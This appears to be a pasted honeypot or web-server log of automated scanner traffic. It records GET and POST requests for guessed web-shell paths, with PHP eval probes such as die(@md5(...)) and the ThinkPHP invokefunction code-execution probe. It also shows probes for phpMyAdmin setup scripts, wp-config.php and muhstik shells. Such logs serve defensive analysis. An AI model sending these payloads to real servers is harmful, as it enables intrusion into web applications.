- "@timestamp": "2018-12-17T09:38:57.000Z",
- "data": "POST /qq.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nc=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:56.000Z",
- "data": "POST /mx.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nmx=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:38:56.000Z",
- "data": "POST /wshell.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nbbs=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:56.000Z",
- "data": "POST /xshell.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n520=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:38:55.000Z",
- "data": "POST /db_desql.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n4=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:38:55.000Z",
- "data": "POST /db_dataml.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n4=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:38:54.000Z",
- "data": "POST /wp-admins.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 39\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\najax=true\u0026a=Php\u0026p1=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:54.000Z",
- "data": "POST /m.php?pbid=open HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 39\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\najax=true\u0026a=Php\u0026p1=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:54.000Z",
- "data": "POST /db__.init.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\neval=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:53.000Z",
- "data": "POST /db_session.init.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\neval=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:52.000Z",
- "data": "POST /qaq.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nm=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:38:52.000Z",
- "data": "POST /db.init.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\neval=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:52.000Z",
- "data": "POST /sheep.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nm=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:38:51.000Z",
- "data": "POST /s.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nleng=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:51.000Z",
- "data": "POST /w.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nleng=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:50.000Z",
- "data": "POST /9678.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nh=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:50.000Z",
- "data": "POST /wc.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n1=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:50.000Z",
- "data": "POST /xx.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\naxa=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:49.000Z",
- "data": "POST /xw1.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nh=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:48.000Z",
- "data": "GET /TP/html/public/index.php?s=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=md5\u0026vars[1][]=HelloThinkPHP HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:48.000Z",
- "data": "POST /wuwu11.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nh=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:48.000Z",
- "data": "POST /xw.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nh=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:38:47.000Z",
- "data": "GET /TP/index.php?s=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=md5\u0026vars[1][]=HelloThinkPHP HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:47.000Z",
- "data": "GET /TP/public/index.php?s=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=md5\u0026vars[1][]=HelloThinkPHP HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:46.000Z",
- "data": "GET /thinkphp/html/public/index.php?s=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=md5\u0026vars[1][]=HelloThinkPHP HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:46.000Z",
- "data": "GET /thinkphp/public/index.php?s=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=md5\u0026vars[1][]=HelloThinkPHP HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:46.000Z",
- "data": "GET /html/public/index.php?s=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=md5\u0026vars[1][]=HelloThinkPHP HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:45.000Z",
- "data": "GET /public/index.php?s=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=md5\u0026vars[1][]=HelloThinkPHP HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:44.000Z",
- "data": "GET /cacti/plugins/weathermap/editor.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:44.000Z",
- "data": "GET /plugins/weathermap/editor.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:44.000Z",
- "data": "GET /index.php?s=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=md5\u0026vars[1][]=HelloThinkPHP HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:43.000Z",
- "data": "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:43.000Z",
- "data": "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:42.000Z",
- "data": "GET /phpmyadmin/scripts/setup.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:42.000Z",
- "data": "GET /phpMyAdmin/scripts/setup.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:42.000Z",
- "data": "GET /scripts/setup.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:41.000Z",
- "data": "GET /appserv.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:40.000Z",
- "data": "GET /cmd.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:40.000Z",
- "data": "GET /shell.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:40.000Z",
- "data": "GET /knal.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:39.000Z",
- "data": "GET /cmv.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:39.000Z",
- "data": "GET /cmdd.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:38.000Z",
- "data": "GET /uploader.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:38.000Z",
- "data": "GET /cmd.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:38.000Z",
- "data": "GET /cmx.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:37.000Z",
- "data": "GET /lol.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:36.000Z",
- "data": "GET /muhstik2.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:36.000Z",
- "data": "GET /muhstik-dpr.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:36.000Z",
- "data": "GET /muhstiks.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:35.000Z",
- "data": "GET /muhstik.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:35.000Z",
- "data": "GET /wp-config.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:34.000Z",
- "data": "GET /wpc.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:34.000Z",
- "data": "GET /wpo.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:34.000Z",
- "data": "GET /text.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:33.000Z",
- "data": "GET /lala-dpr.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:32.000Z",
- "data": "GET /z.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:32.000Z",
- "data": "GET /desktop.ini.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:32.000Z",
- "data": "GET /lala.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:31.000Z",
- "data": "GET /shell.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:31.000Z",
- "data": "GET /htdocs.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:30.000Z",
- "data": "GET /x.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:30.000Z",
- "data": "GET /pmd_online.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:30.000Z",
- "data": "GET /hell.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:29.000Z",
- "data": "GET /log.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:28.000Z",
- "data": "GET /logon.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:28.000Z",
- "data": "GET /help-e.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:27.000Z",
- "data": "GET /db_pma.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:26.000Z",
- "data": "GET /db_cts.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:26.000Z",
- "data": "GET /test.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:25.000Z",
- "data": "GET /_query.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:24.000Z",
- "data": "GET /help.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:38:24.000Z",
- "data": "GET /webdav/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nUser-Agent: Mozilla/5.0\r\nConnection: Close\r\n\r\n"
- }
- ],
- "inputs": {}
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement